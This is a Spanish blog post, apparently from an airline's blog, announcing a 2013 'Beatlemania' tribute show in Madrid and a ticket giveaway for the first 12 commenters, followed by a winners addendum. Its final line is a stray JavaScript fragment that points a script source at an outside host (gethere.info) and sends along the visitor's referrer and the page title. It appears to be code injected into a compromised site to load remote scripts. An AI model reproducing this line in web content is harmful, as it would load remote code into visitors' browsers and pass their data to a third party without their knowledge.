Beatlemania en Madrid: ¡consigue tus entradas!

01/07/2013

Los Beatles con Iberia - Beatlemania¡Atención fans! El próximo 3 de Julio se estrena en Madrid el espectáculo «Beatlemania«, interpretado por la banda “Beatlemajesty” (según la revista TIME es la mejor banda no-beatle de la historia) y que rememora la llegada de los Beatles a Madrid el 1 de Julio de 1965.

¿Estáis en Madrid y os gustaría conseguir entradas gratis para 2 personas para el día 4 de julio? Si vuestra respuesta es sí, ¡a por ello! Los 12 primeros que comentéis este post indicándonos que sí deseáis estos packs de entradas dobles, ¡serán vuestras! Además, tendréis oportunidad de haceros una foto en una escalerilla de Iberia para reproducir el momento que veis en la foto arriba, su llegada a Madrid en octubre de 1967.

Tenéis desde ahora hasta las 23:59 horas de hoy día 1 de julio para apuntaros. Los 12 primeros que dejen su comentario junto con su nombre y apellidos tal cual se pide en el formulario, los incluiremos en una lista y ¡serán los ganadores!

Espectáculo: Beatlemania

Lugar: Teatro Nuevo Apolo, Madrid

Cuándo: jueves 4 de julio

Hora: 21.00 horas.

Recogida de entradas: a partir de las 20.15 horas del 4 de julio en el Teatro Nuevo Apolo.

Importante: Los comentarios requieren autorización por parte del gestor del blog, por eso es  posible que no los veáis publicados al momento pero, los comentarios serán publicados por orden cronológico a medida que se vayan recibiendo. Solo publicaremos aquellos que hayan dejado su nombre y al menos un apellido en el formulario y que además comenten en el mismo. No podrá ganar la misma persona más de un pack de entradas.

——————————————————————————————-

Y los ganadores (los 12 primeros que han dejado un comentario junto a su nombre y apellidos como pedíamos)  de las entradas son:

Beatlemania en Madrid ¡consigue tus entradas!  Me gusta volar - Mozilla Firefox

Podéis recogerlas en taquilla antes del inicio el mismo día 4 de julio. ¡Que disfrutéis!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;